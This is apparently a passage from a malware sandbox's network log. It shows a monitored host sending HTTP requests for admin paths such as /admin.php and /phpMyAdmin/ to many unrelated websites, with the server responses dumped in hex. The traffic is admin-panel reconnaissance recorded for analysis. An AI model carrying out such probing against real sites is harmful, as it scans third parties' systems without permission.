                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                392192.168.2.663015192.185.5.2380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.154084921 CET173OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.281251907 CET226INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Vary: User-Agent
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=6a863be9643b7bff70e69f550745b56e; path=/


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                393192.168.2.66294147.251.24.18880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.156270027 CET172OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.342726946 CET345INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://cjdropshipping.com/pma
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                394192.168.2.663006104.22.74.22080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.163409948 CET174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.291172028 CET345INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd491e8ab0fd-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                395192.168.2.66304913.249.120.480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.172538996 CET165OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.274214983 CET565INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://tiktok.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 4eb6db543899d63048055031c3411b00.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: fLEkV-kEmXDNeW-9EV63tcD1tcMYdS1mYEtsOEpKx1tejv2JxRCjKA==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                396192.168.2.66306334.149.46.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.181798935 CET180OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.284260035 CET209INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/admin.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                397192.168.2.66306531.13.65.180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.181854010 CET170OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.283505917 CET204INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                398192.168.2.66306631.13.65.180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.181900978 CET177OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.283644915 CET211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                399192.168.2.663051195.85.23.9580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.188736916 CET175OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.413527012 CET681INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-reserve101-ded7160
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=MGzIcCHX4eKZdDwJDLWZxYq.eJQj2PLKrao.hMK0QLk-1707131767-1-AU9osYYGrdr2/kgnmMBLWJTNZX/3l+Z8EANxGU2bUm9wb1MeO4yIXLO1wblwe3Vwt7YTFtM8eBc26qPfWYy3O8E=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd494a026783-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 00 00 ff ff 03 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 73(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.413563013 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                400192.168.2.66306420.231.114.2480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.194691896 CET177OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.mojang.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.312316895 CET351INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.minecraft.net/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                401192.168.2.663072138.197.59.19980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.202028036 CET182OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.320137024 CET560INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/admin.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 338
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/admin.php">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                402192.168.2.66311296.7.224.17880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212187052 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.322809935 CET622INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 264
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131767264_1611129006_213793778_15_8964_103_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 36 37 26 23 34 36 3b 63 62 65 33 62 66 32 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3bf2</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                403192.168.2.663119162.241.203.3080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.215114117 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.329125881 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
